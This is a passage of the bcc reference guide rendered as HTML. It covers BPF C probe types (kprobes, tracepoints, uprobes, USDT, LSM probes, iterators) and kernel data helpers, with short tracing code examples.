<li><a href="bcc-documents/reference_guide.html#9-ringbuf_discard">9. ringbuf_discard()</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#maps">Maps</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-bpf_table">1. BPF_TABLE</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-bpf_hash">2. BPF_HASH</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#3-bpf_array">3. BPF_ARRAY</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#4-bpf_histogram">4. BPF_HISTOGRAM</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#5-bpf_stack_trace">5. BPF_STACK_TRACE</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#6-bpf_perf_array">6. BPF_PERF_ARRAY</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#7-bpf_percpu_hash">7. BPF_PERCPU_HASH</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#8-bpf_percpu_array">8. BPF_PERCPU_ARRAY</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#9-bpf_lpm_trie">9. BPF_LPM_TRIE</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#10-bpf_prog_array">10. BPF_PROG_ARRAY</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#11-bpf_devmap">11. BPF_DEVMAP</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#12-bpf_cpumap">12. BPF_CPUMAP</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#13-bpf_xskmap">13. BPF_XSKMAP</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#14-bpf_array_of_maps">14. BPF_ARRAY_OF_MAPS</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#15-bpf_hash_of_maps">15. BPF_HASH_OF_MAPS</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#16-bpf_stack">16. BPF_STACK</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#17-bpf_queue">17. BPF_QUEUE</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#18-bpf_sockhash">18. BPF_SOCKHASH</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#19-maplookup">19. map.lookup()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#20-maplookup_or_try_init">20. map.lookup_or_try_init()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#21-mapdelete">21. map.delete()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#22-mapupdate">22. map.update()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#23-mapinsert">23. map.insert()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#24-mapincrement">24. map.increment()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#25-mapget_stackid">25. map.get_stackid()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#26-mapperf_read">26. map.perf_read()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#27-mapcall">27. map.call()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#28-mapredirect_map">28. map.redirect_map()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#29-mappush">29. map.push()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#30-mappop">30. map.pop()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#31-mappeek">31. map.peek()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#32-mapsock_hash_update">32. map.sock_hash_update()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#33-mapmsg_redirect_hash">33. map.msg_redirect_hash()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#34-mapsk_redirect_hash">34. map.sk_redirect_hash()</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#licensing">Licensing</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#rewriter">Rewriter</a></li>
|
||
</ul>
|
||
</li>
|
||
<li>
|
||
<p><a href="bcc-documents/reference_guide.html#bcc-python">bcc Python</a></p>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#initialization">Initialization</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-bpf">1. BPF</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-usdt">2. USDT</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#events">Events</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-attach_kprobe">1. attach_kprobe()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-attach_kretprobe">2. attach_kretprobe()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#3-attach_tracepoint">3. attach_tracepoint()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#4-attach_uprobe">4. attach_uprobe()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#5-attach_uretprobe">5. attach_uretprobe()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#6-usdtenable_probe">6. USDT.enable_probe()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#7-attach_raw_tracepoint">7. attach_raw_tracepoint()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#8-attach_raw_socket">8. attach_raw_socket()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#9-attach_xdp">9. attach_xdp()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#10-attach_func">10. attach_func()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#11-detach_func">11. detach_func()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#12-detach_kprobe">12. detach_kprobe()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#13-detach_kretprobe">13. detach_kretprobe()</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#debug-output">Debug Output</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-trace_print">1. trace_print()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-trace_fields">2. trace_fields()</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#output-apis">Output APIs</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-perf_buffer_poll">1. perf_buffer_poll()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-ring_buffer_poll">2. ring_buffer_poll()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#3-ring_buffer_consume">3. ring_buffer_consume()</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#map-apis">Map APIs</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-get_table">1. get_table()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-open_perf_buffer">2. open_perf_buffer()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#3-items">3. items()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#4-values">4. values()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#5-clear">5. clear()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#6-items_lookup_and_delete_batch">6. items_lookup_and_delete_batch()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#7-items_lookup_batch">7. items_lookup_batch()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#8-items_delete_batch">8. items_delete_batch()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#9-items_update_batch">9. items_update_batch()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#10-print_log2_hist">10. print_log2_hist()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#11-print_linear_hist">11. print_linear_hist()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#12-open_ring_buffer">12. open_ring_buffer()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#13-push">13. push()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#14-pop">14. pop()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#15-peek">15. peek()</a></li>
|
||
</ul>
|
||
</li>
|
||
<li><a href="bcc-documents/reference_guide.html#helpers">Helpers</a>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-ksym">1. ksym()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-ksymname">2. ksymname()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#3-sym">3. sym()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#4-num_open_kprobes">4. num_open_kprobes()</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#5-get_syscall_fnname">5. get_syscall_fnname()</a></li>
|
||
</ul>
|
||
</li>
|
||
</ul>
|
||
</li>
|
||
<li>
|
||
<p><a href="bcc-documents/reference_guide.html#bpf-errors">BPF Errors</a></p>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-invalid-mem-access">1. Invalid mem access</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-cannot-call-gpl-only-function-from-proprietary-program">2. Cannot call GPL only function from proprietary program</a></li>
|
||
</ul>
|
||
</li>
|
||
<li>
|
||
<p><a href="bcc-documents/reference_guide.html#environment-variables">Environment Variables</a></p>
|
||
<ul>
|
||
<li><a href="bcc-documents/reference_guide.html#1-kernel-source-directory">1. kernel source directory</a></li>
|
||
<li><a href="bcc-documents/reference_guide.html#2-kernel-version-overriding">2. kernel version overriding</a></li>
|
||
</ul>
|
||
</li>
|
||
</ul>
|
||
<h1 id="bpf-c"><a class="header" href="#bpf-c">BPF C</a></h1>
|
||
<p>This section describes the C part of a bcc program.</p>
|
||
<h2 id="events--arguments"><a class="header" href="#events--arguments">Events & Arguments</a></h2>
|
||
<h3 id="1-kprobes"><a class="header" href="#1-kprobes">1. kprobes</a></h3>
|
||
<p>Syntax: kprobe__<em>kernel_function_name</em></p>
|
||
<p><code>kprobe__</code> is a special prefix that creates a kprobe (dynamic tracing of a kernel function call) for the kernel function name provided as the remainder. You can also use kprobes by declaring a normal C function, then using the Python <code>BPF.attach_kprobe()</code> (covered later) to associate it with a kernel function.</p>
|
||
<p>Arguments are specified on the function declaration: kprobe__<em>kernel_function_name</em>(struct pt_regs *ctx [, <em>argument1</em> ...])</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-c">int kprobe__tcp_v4_connect(struct pt_regs *ctx, struct sock *sk) {
|
||
[...]
|
||
}
|
||
</code></pre>
|
||
<p>This instruments the tcp_v4_connect() kernel function using a kprobe, with the following arguments:</p>
|
||
<ul>
|
||
<li><code>struct pt_regs *ctx</code>: Registers and BPF context.</li>
|
||
<li><code>struct sock *sk</code>: First argument to tcp_v4_connect().</li>
|
||
</ul>
|
||
<p>The first argument is always <code>struct pt_regs *</code>, the remainder are the arguments to the function (they don't need to be specified, if you don't intend to use them).</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/4afa96a71c5dbfc4c507c3355e20baa6c184a3a8/examples/tracing/tcpv4connect.py#L28">code</a> (<a href="https://github.com/iovisor/bcc/blob/5bd0eb21fd148927b078deb8ac29fff2fb044b66/examples/tracing/tcpv4connect_example.txt#L8">output</a>),
|
||
<a href="https://github.com/iovisor/bcc/commit/310ab53710cfd46095c1f6b3e44f1dbc8d1a41d8#diff-8cd1822359ffee26e7469f991ce0ef00R26">code</a> (<a href="https://github.com/iovisor/bcc/blob/3b9679a3bd9b922c736f6061dc65cb56de7e0250/examples/tracing/bitehist_example.txt#L6">output</a>)</p>
|
||
<!--- I can't add search links here, since github currently cannot handle partial-word searches needed for "kprobe__" --->
|
||
<h3 id="2-kretprobes"><a class="header" href="#2-kretprobes">2. kretprobes</a></h3>
|
||
<p>Syntax: kretprobe__<em>kernel_function_name</em></p>
|
||
<p><code>kretprobe__</code> is a special prefix that creates a kretprobe (dynamic tracing of a kernel function return) for the kernel function name provided as the remainder. You can also use kretprobes by declaring a normal C function, then using the Python <code>BPF.attach_kretprobe()</code> (covered later) to associate it with a kernel function.</p>
|
||
<p>Return value is available as <code>PT_REGS_RC(ctx)</code>, given a function declaration of: kretprobe__<em>kernel_function_name</em>(struct pt_regs *ctx)</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">int kretprobe__tcp_v4_connect(struct pt_regs *ctx)
|
||
{
|
||
int ret = PT_REGS_RC(ctx);
|
||
[...]
|
||
}
|
||
</code></pre>
|
||
<p>This instruments the return of the tcp_v4_connect() kernel function using a kretprobe, and stores the return value in <code>ret</code>.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/4afa96a71c5dbfc4c507c3355e20baa6c184a3a8/examples/tracing/tcpv4connect.py#L38">code</a> (<a href="https://github.com/iovisor/bcc/blob/5bd0eb21fd148927b078deb8ac29fff2fb044b66/examples/tracing/tcpv4connect_example.txt#L8">output</a>)</p>
|
||
<h3 id="3-tracepoints"><a class="header" href="#3-tracepoints">3. Tracepoints</a></h3>
|
||
<p>Syntax: TRACEPOINT_PROBE(<em>category</em>, <em>event</em>)</p>
|
||
<p>This is a macro that instruments the tracepoint defined by <em>category</em>:<em>event</em>.</p>
|
||
<p>The tracepoint name is <code>&lt;category&gt;:&lt;event&gt;</code>.
|
||
The probe function name is <code>tracepoint__&lt;category&gt;__&lt;event&gt;</code>.</p>
|
||
<p>Arguments are available in an <code>args</code> struct, which are the tracepoint arguments. One way to list these is to cat the relevant format file under /sys/kernel/debug/tracing/events/<em>category</em>/<em>event</em>/format.</p>
|
||
<p>The <code>args</code> struct can be used in place of <code>ctx</code> in any function requiring a context as an argument. This notably includes <a href="bcc-documents/reference_guide.html#3-perf_submit">perf_submit()</a>.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">TRACEPOINT_PROBE(random, urandom_read) {
|
||
// args is from /sys/kernel/debug/tracing/events/random/urandom_read/format
|
||
bpf_trace_printk("%d\\n", args->got_bits);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>This instruments the <code>random:urandom_read</code> tracepoint, and prints the tracepoint argument <code>got_bits</code>.
|
||
When using Python API, this probe is automatically attached to the right tracepoint target.
|
||
For C++, this tracepoint probe can be attached by specifying the tracepoint target and function name explicitly:
|
||
<code>BPF::attach_tracepoint("random:urandom_read", "tracepoint__random__urandom_read")</code>
|
||
Note the name of the probe function defined above is <code>tracepoint__random__urandom_read</code>.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/a4159da8c4ea8a05a3c6e402451f530d6e5a8b41/examples/tracing/urandomread.py#L19">code</a> (<a href="https://github.com/iovisor/bcc/commit/e422f5e50ecefb96579b6391a2ada7f6367b83c4#diff-41e5ecfae4a3b38de5f4e0887ed160e5R10">output</a>),
|
||
<a href="https://github.com/iovisor/bcc/search?q=TRACEPOINT_PROBE+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=TRACEPOINT_PROBE+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="4-uprobes"><a class="header" href="#4-uprobes">4. uprobes</a></h3>
|
||
<p>These are instrumented by declaring a normal function in C, then associating it as a uprobe probe in Python via <code>BPF.attach_uprobe()</code> (covered later).</p>
|
||
<p>Arguments can be examined using <code>PT_REGS_PARM</code> macros.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">int count(struct pt_regs *ctx) {
|
||
char buf[64];
|
||
bpf_probe_read_user(&buf, sizeof(buf), (void *)PT_REGS_PARM1(ctx));
|
||
bpf_trace_printk("%s %d", buf, PT_REGS_PARM2(ctx));
|
||
return(0);
|
||
}
|
||
</code></pre>
|
||
<p>This reads the first argument as a string, and then prints it with the second argument as an integer.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/4afa96a71c5dbfc4c507c3355e20baa6c184a3a8/examples/tracing/strlen_count.py#L26">code</a></p>
|
||
<h3 id="5-uretprobes"><a class="header" href="#5-uretprobes">5. uretprobes</a></h3>
|
||
<p>These are instrumented by declaring a normal function in C, then associating it as a uretprobe probe in Python via <code>BPF.attach_uretprobe()</code> (covered later).</p>
|
||
<p>Return value is available as <code>PT_REGS_RC(ctx)</code>, given a function declaration of: <em>function_name</em>(struct pt_regs *ctx)</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">BPF_HISTOGRAM(dist);
|
||
int count(struct pt_regs *ctx) {
|
||
dist.increment(PT_REGS_RC(ctx));
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>This increments the bucket in the <code>dist</code> histogram that is indexed by the return value.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/4afa96a71c5dbfc4c507c3355e20baa6c184a3a8/examples/tracing/strlen_hist.py#L39">code</a> (<a href="https://github.com/iovisor/bcc/blob/4afa96a71c5dbfc4c507c3355e20baa6c184a3a8/examples/tracing/strlen_hist.py#L15">output</a>),
|
||
<a href="https://github.com/iovisor/bcc/blob/4afa96a71c5dbfc4c507c3355e20baa6c184a3a8/tools/bashreadline.py">code</a> (<a href="https://github.com/iovisor/bcc/commit/aa87997d21e5c1a6a20e2c96dd25eb92adc8e85d#diff-2fd162f9e594206f789246ce97d62cf0R7">output</a>)</p>
|
||
<h3 id="6-usdt-probes"><a class="header" href="#6-usdt-probes">6. USDT probes</a></h3>
|
||
<p>These are User Statically-Defined Tracing (USDT) probes, which may be placed in some applications or libraries to provide a user-level equivalent of tracepoints. The primary BPF method provided for USDT support is <code>enable_probe()</code>. USDT probes are instrumented by declaring a normal function in C, then associating it as a USDT probe in Python via <code>USDT.enable_probe()</code>.</p>
|
||
<p>Arguments can be read via: bpf_usdt_readarg(<em>index</em>, ctx, &addr)</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">int do_trace(struct pt_regs *ctx) {
|
||
uint64_t addr;
|
||
char path[128];
|
||
bpf_usdt_readarg(6, ctx, &addr);
|
||
bpf_probe_read_user(&path, sizeof(path), (void *)addr);
|
||
bpf_trace_printk("path:%s\\n", path);
|
||
return 0;
|
||
};
|
||
</code></pre>
|
||
<p>This reads the sixth USDT argument, and then pulls it in as a string to <code>path</code>.</p>
|
||
<p>When initializing USDTs via the third argument of <code>BPF::init</code> in the C API, if any USDT fails to <code>init</code>, the entire <code>BPF::init</code> will fail. If you're OK with some USDTs failing to <code>init</code>, use <code>BPF::init_usdt</code> before calling <code>BPF::init</code>.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/commit/4f88a9401357d7b75e917abd994aa6ea97dda4d3#diff-04a7cad583be5646080970344c48c1f4R24">code</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_usdt_readarg+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_usdt_readarg+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="7-raw-tracepoints"><a class="header" href="#7-raw-tracepoints">7. Raw Tracepoints</a></h3>
|
||
<p>Syntax: RAW_TRACEPOINT_PROBE(<em>event</em>)</p>
|
||
<p>This is a macro that instruments the raw tracepoint defined by <em>event</em>.</p>
|
||
<p>The argument is a pointer to struct <code>bpf_raw_tracepoint_args</code>, which is defined in <a href="https://github.com/iovisor/bcc/blob/master/src/cc/compat/linux/virtual_bpf.h">bpf.h</a>. The struct field <code>args</code> contains all parameters of the raw tracepoint, which can be found in the Linux tree's <a href="https://github.com/torvalds/linux/tree/master/include/trace/events">include/trace/events</a>
|
||
directory.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">RAW_TRACEPOINT_PROBE(sched_switch)
|
||
{
|
||
// TP_PROTO(bool preempt, struct task_struct *prev, struct task_struct *next)
|
||
struct task_struct *prev = (struct task_struct *)ctx->args[1];
|
||
struct task_struct *next= (struct task_struct *)ctx->args[2];
|
||
s32 prev_tgid, next_tgid;
|
||
|
||
bpf_probe_read_kernel(&prev_tgid, sizeof(prev->tgid), &prev->tgid);
|
||
bpf_probe_read_kernel(&next_tgid, sizeof(next->tgid), &next->tgid);
|
||
bpf_trace_printk("%d -> %d\\n", prev_tgid, next_tgid);
|
||
}
|
||
</code></pre>
|
||
<p>This instruments the sched:sched_switch tracepoint, and prints the prev and next tgid.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=RAW_TRACEPOINT_PROBE+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="8-system-call-tracepoints"><a class="header" href="#8-system-call-tracepoints">8. system call tracepoints</a></h3>
|
||
<p>Syntax: <code>syscall__SYSCALLNAME</code></p>
|
||
<p><code>syscall__</code> is a special prefix that creates a kprobe for the system call name provided as the remainder. You can use it by declaring a normal C function, then using the Python <code>BPF.get_syscall_fnname(SYSCALLNAME)</code> and <code>BPF.attach_kprobe()</code> to associate it.</p>
|
||
<p>Arguments are specified on the function declaration: <code>syscall__SYSCALLNAME(struct pt_regs *ctx [, argument1 ...])</code>.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">int syscall__execve(struct pt_regs *ctx,
|
||
const char __user *filename,
|
||
const char __user *const __user *__argv,
|
||
const char __user *const __user *__envp)
|
||
{
|
||
[...]
|
||
}
|
||
</code></pre>
|
||
<p>This instruments the execve system call.</p>
|
||
<p>The first argument is always <code>struct pt_regs *</code>, the remainder are the arguments to the function (they don't need to be specified, if you don't intend to use them).</p>
|
||
<p>Corresponding Python code:</p>
|
||
<pre><code class="language-Python">b = BPF(text=bpf_text)
|
||
execve_fnname = b.get_syscall_fnname("execve")
|
||
b.attach_kprobe(event=execve_fnname, fn_name="syscall__execve")
|
||
</code></pre>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/blob/552658edda09298afdccc8a4b5e17311a2d8a771/tools/execsnoop.py#L101">code</a> (<a href="https://github.com/iovisor/bcc/blob/552658edda09298afdccc8a4b5e17311a2d8a771/tools/execsnoop_example.txt#L8">output</a>)</p>
|
||
<h3 id="9-kfuncs"><a class="header" href="#9-kfuncs">9. kfuncs</a></h3>
|
||
<p>Syntax: KFUNC_PROBE(<em>function</em>, typeof(arg1) arg1, typeof(arg2) arg2 ...)</p>
|
||
<p>This is a macro that instruments the kernel function via trampoline
|
||
<em>before</em> the function is executed. It's defined by <em>function</em> name and
|
||
the function arguments defined as <em>argX</em>.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">KFUNC_PROBE(do_sys_open, int dfd, const char *filename, int flags, int mode)
|
||
{
|
||
...
|
||
</code></pre>
|
||
<p>This instruments the do_sys_open kernel function and makes its arguments
|
||
accessible as standard argument values.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=KFUNC_PROBE+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="10-kretfuncs"><a class="header" href="#10-kretfuncs">10. kretfuncs</a></h3>
|
||
<p>Syntax: KRETFUNC_PROBE(<em>function</em>, typeof(arg1) arg1, typeof(arg2) arg2 ..., int ret)</p>
|
||
<p>This is a macro that instruments the kernel function via trampoline
|
||
<em>after</em> the function is executed. It's defined by <em>function</em> name and
|
||
the function arguments defined as <em>argX</em>.</p>
|
||
<p>The last argument of the probe is the return value of the instrumented function.</p>
|
||
<p>For example:</p>
|
||
<pre><code class="language-C">KRETFUNC_PROBE(do_sys_open, int dfd, const char *filename, int flags, int mode, int ret)
|
||
{
|
||
...
|
||
</code></pre>
|
||
<p>This instruments the do_sys_open kernel function and makes its arguments
|
||
accessible as standard argument values together with its return value.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=KRETFUNC_PROBE+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="11-lsm-probes"><a class="header" href="#11-lsm-probes">11. LSM Probes</a></h3>
|
||
<p>Syntax: LSM_PROBE(<em>hook</em>, typeof(arg1) arg1, typeof(arg2) arg2 ...)</p>
|
||
<p>This is a macro that instruments an LSM hook as a BPF program. It can be
|
||
used to audit security events and implement MAC security policies in BPF.
|
||
It is defined by specifying the hook name followed by its arguments.</p>
|
||
<p>Hook names can be found in
|
||
<a href="https://github.com/torvalds/linux/blob/v5.15/include/linux/security.h#L260">include/linux/security.h</a>
|
||
by taking functions like <code>security_hookname</code> and taking just the <code>hookname</code> part.
|
||
For example, <code>security_bpf</code> would simply become <code>bpf</code>.</p>
|
||
<p>Unlike other BPF program types, the return value specified in an LSM probe
|
||
matters. A return value of 0 allows the hook to succeed, whereas
|
||
any non-zero return value will cause the hook to fail and deny the
|
||
security operation.</p>
|
||
<p>The following example instruments a hook that denies all future BPF operations:</p>
|
||
<pre><code class="language-C">LSM_PROBE(bpf, int cmd, union bpf_attr *attr, unsigned int size)
|
||
{
|
||
return -EPERM;
|
||
}
|
||
</code></pre>
|
||
<p>This instruments the <code>security_bpf</code> hook and causes it to return <code>-EPERM</code>.
|
||
Changing <code>return -EPERM</code> to <code>return 0</code> would cause the BPF program
|
||
to allow the operation instead.</p>
|
||
<p>LSM probes require at least a 5.7 kernel with the following configuration options set:</p>
|
||
<ul>
|
||
<li><code>CONFIG_BPF_LSM=y</code></li>
|
||
<li><code>CONFIG_LSM</code> comma separated string must contain "bpf" (for example,
|
||
<code>CONFIG_LSM="lockdown,yama,bpf"</code>)</li>
|
||
</ul>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=LSM_PROBE+path%3Atests&type=Code">search /tests</a></p>
|
||
<h3 id="12-bpf-iterators"><a class="header" href="#12-bpf-iterators">12. BPF ITERATORS</a></h3>
|
||
<p>Syntax: BPF_ITER(target)</p>
|
||
<p>This is a macro to define a program signature for a bpf iterator program. The argument <em>target</em> specifies what to iterate for the program.</p>
|
||
<p>Currently, the kernel does not have an interface to discover what targets are supported. A good place to find what is supported is in <a href="https://github.com/torvalds/linux/blob/master/tools/testing/selftests/bpf/prog_tests/bpf_iter.c">tools/testing/selftests/bpf/prog_tests/bpf_iter.c</a> and some sample bpf iter programs are in <a href="https://github.com/torvalds/linux/tree/master/tools/testing/selftests/bpf/progs">tools/testing/selftests/bpf/progs</a> with file name prefix <em>bpf_iter</em>.</p>
|
||
<p>The following example defines a program for target <em>task</em>, which traverses all tasks in the kernel.</p>
|
||
<pre><code class="language-C">BPF_ITER(task)
|
||
{
|
||
struct seq_file *seq = ctx->meta->seq;
|
||
struct task_struct *task = ctx->task;
|
||
|
||
if (task == (void *)0)
|
||
return 0;
|
||
|
||
... task->pid, task->tgid, task->comm, ...
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>BPF iterators were introduced in the 5.8 kernel for task, task_file, bpf_map, netlink_sock and ipv6_route. In 5.9, support was added for tcp/udp sockets and bpf map element (hashmap, arraymap and sk_local_storage_map) traversal.</p>
|
||
<h2 id="data"><a class="header" href="#data">Data</a></h2>
|
||
<h3 id="1-bpf_probe_read_kernel"><a class="header" href="#1-bpf_probe_read_kernel">1. bpf_probe_read_kernel()</a></h3>
|
||
<p>Syntax: <code>int bpf_probe_read_kernel(void *dst, int size, const void *src)</code></p>
|
||
<p>Return: 0 on success</p>
|
||
<p>This copies size bytes from kernel address space to the BPF stack, so that BPF can later operate on it. For safety, all kernel memory reads must pass through bpf_probe_read_kernel(). This happens automatically in some cases, such as dereferencing kernel variables, as bcc will rewrite the BPF program to include the necessary bpf_probe_read_kernel().</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_probe_read_kernel+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_probe_read_kernel+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="2-bpf_probe_read_kernel_str"><a class="header" href="#2-bpf_probe_read_kernel_str">2. bpf_probe_read_kernel_str()</a></h3>
|
||
<p>Syntax: <code>int bpf_probe_read_kernel_str(void *dst, int size, const void *src)</code></p>
|
||
<p>Return:</p>
|
||
<ul>
|
||
<li>> 0 length of the string including the trailing NULL on success</li>
|
||
<li>< 0 error</li>
|
||
</ul>
|
||
<p>This copies a <code>NULL</code> terminated string from kernel address space to the BPF stack, so that BPF can later operate on it. In case the string length is smaller than size, the target is not padded with further <code>NULL</code> bytes. In case the string length is larger than size, just <code>size - 1</code> bytes are copied and the last byte is set to <code>NULL</code>.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_probe_read_kernel_str+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_probe_read_kernel_str+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="3-bpf_ktime_get_ns"><a class="header" href="#3-bpf_ktime_get_ns">3. bpf_ktime_get_ns()</a></h3>
|
||
<p>Syntax: <code>u64 bpf_ktime_get_ns(void)</code></p>
|
||
<p>Return: u64 number of nanoseconds. Starts at system boot time but stops during suspend.</p>
|
||
<p>Examples in situ:
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_ktime_get_ns+path%3Aexamples&type=Code">search /examples</a>,
|
||
<a href="https://github.com/iovisor/bcc/search?q=bpf_ktime_get_ns+path%3Atools&type=Code">search /tools</a></p>
|
||
<h3 id="4-bpf_get_current_pid_tgid"><a class="header" href="#4-bpf_get_current_pid_tgid">4. bpf_get_current_pid_tgid()</a></h3>
|
||
<p>Syntax: <code>u64 bpf_get_current_pid_tgid(void)</code></p>
|
||
<p>Return: <code>current->tgid << 32 | current->pid</code></p>
|
||
<p>Returns the process ID in the lower 32 bits (kernel's view of the PID, which in user space is usually presented as the thread ID), and the thread group ID in the upper 32 bits (what user space often thinks of as the PID). By directly setting this to a u32, we discard the upper 32 bits.</p>
|
||
